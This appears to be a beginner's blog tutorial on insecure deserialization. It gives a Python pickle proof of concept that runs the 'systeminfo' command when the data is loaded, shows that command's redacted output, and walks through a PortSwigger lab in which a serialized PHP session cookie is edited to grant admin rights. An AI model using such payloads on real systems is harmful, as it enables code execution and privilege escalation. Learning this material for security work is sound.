Topics cover In this short blog
What is Serialization
What is Deserialization
Example code with python package Pickle
Example with Portswigger Labs to exploit Deserialization
What is Serialization:- It is the process of converting an object to a stream of Byte to a non-readable data or in Programming Language(an Encoding data depends on the server) It will store data in disk And send back to Network(Ex:-{“name” : “cookie”, “age” : “21”, “User” : “user”} Think it’s an object and my server is using base64 encoding. by using Serialization I'll encode it in base64 and store it in my local disk as eyJuYW1lIiA6ICJjb29raWUiLCAiYWdlIiA6ICIyMSIsICJVc2VyIiA6ICJ1c2VyIn0=)
What is Deserialization:- It is the complete opposite of Serialization that reverse back a stream of the byte’s into the Actual object(Ex:-eyJuYW1lIiA6ICJjb29raWUiLCAiYWdlIiA6ICIyMSIsICJVc2VyIiA6ICJ1c2VyIn0= to{“name” : “cookie”, “age” : “21”, “User” : “user”})
Where is the attack scenario?:- it's in Serialization An attacker can simply modify the base64 value(in this entire blog I’ll use base64 encoding) or can chain multiple attack’s like directory transversal, privilege escalation
Creating attack scenario Using pickle:-
import pickle
import osclass Deserialization:
def __init__(self, command):
self.command = command
def __reduce__(self):
return (os.system, (self.command, ))# Attacker side Serialization craft a payload
A = Deserialization('systeminfo') #systeminfo to cmd
B = pickle.dumps(A) #dumps() will write pickled object into disk
print(B)#payload
print("Serialization Done")
print(50 * "-")# server Side Deserialization
print(" Deserialization\n")
pickle.loads(B) #loads() will read stream data to object
print(" Deserialization Done")
Output:-
b'\x80\x04\x95"\x00\x00\x00\x00\x00\x00\x00\x8c\x02nt\x94\x8c\x06system\x94\x93\x94\x8c\nsysteminfo\x94\x85\x94R\x94.'
Serialization Done
--------------------------------------------------
Deserialization
Host Name: Desktop
OS Name: Microsoft Windows 10
OS Version: 10.0.19041 Removed
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Multiprocessor Free
Registered Owner: Removed
Registered Organization:
Product ID: removed
Original Install Date: Removed
System Boot Time: Removed
System Manufacturer: ASUSTeK COMPUTER INC.
System Model: Removed
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: Intel64 Family 6 Model 142 Stepping 10 GenuineIntel ~1600 Mhz
BIOS Version: American Megatrends Inc. Removed
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Path
System Locale: en-us;English (United States)
Input Locale: 00004009
Time Zone: (UTC+05:30) Chennai, Kolkata, Mumbai, New Delhi
Total Physical Memory: 8,074 MB
Available Physical Memory: 2,079 MB
Virtual Memory: Max Size: 15,886 MB
Virtual Memory: Available: 5,704 MB
Virtual Memory: In Use: 10,182 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: \\Removed
Hotfix(s): 7 Hotfix(s) Installed.
[01]: Removed
[02]: Removed
[03]: Removed
[04]: Removed
[05]: Removed
[06]: Removed
[07]: Removed
Network Card(s): 3 NIC(s) Installed.
[01]: Removed
Connection Name: Wi-Fi
DHCP Enabled: Yes
DHCP Server: IP
IP address(es)
[01]: IP
[02]: IP
[02]: Bluetooth Device (Personal Area Network)
Connection Name: Bluetooth Network Connection
Status: Media disconnected
[03]: VirtualBox Host-Only Ethernet Adapter
Connection Name: VirtualBox Host-Only Network
DHCP Enabled: No
IP address(es)
[01]: Ip
[02]: IP
Hyper-V Requirements: VM Monitor Mode Extensions: Yes
Virtualization Enabled In Firmware: Yes
Second Level Address Translation: Yes
Data Execution Prevention Available: Yes
Deserialization Done
NOte :- i Removed some senstive data Kept "Removed" in place of Removed data
The attacker will craft the binary data As “systeminfo” when the Deserialization occurs the attacker can obtain the sensitive data like in a similar case the server will serialize the data and deserialize data
How to prevent this case:- 1.Isolating and running code that deserializes in low privilege environments when possible 2. Monitoring deserialization, alerting if a user deserializes constantly
Portswigger Labs Example :- If you want to try attacks On Insecure deserialization visit https://portswigger.net/web-security/deserialization
the webPage is vulnerable to Deserialization without validating user input the webpage functionality will authenticate the user with a username and password. the server will authorize by giving back a session token
The value O:4:”User”:2{s:8:”username”;s:6:”wiener”;s:5:”admin”;b:0;}6w
Now think as it User:{“usernme”: “wiener” ; “admin” : “b:0”} ok the first username representing the current user and second parameter representing Is it admin b:0 => is not admin, and b:1=> is admin so I changed to b:1 to escalate to admin So the payload will be
O:4:”User”:2:{s:8:”username”;s:6:”wiener”;s:5:”admin”;b:1;}6w and it will give us admin privilege
Now I have a new option Admin panel So When serialization happens the server doesn't check what the user is sending and blindly trusting input wherein Deserialize the User input will help to Escalate to the admin level
Thank you
Regards,
rohith.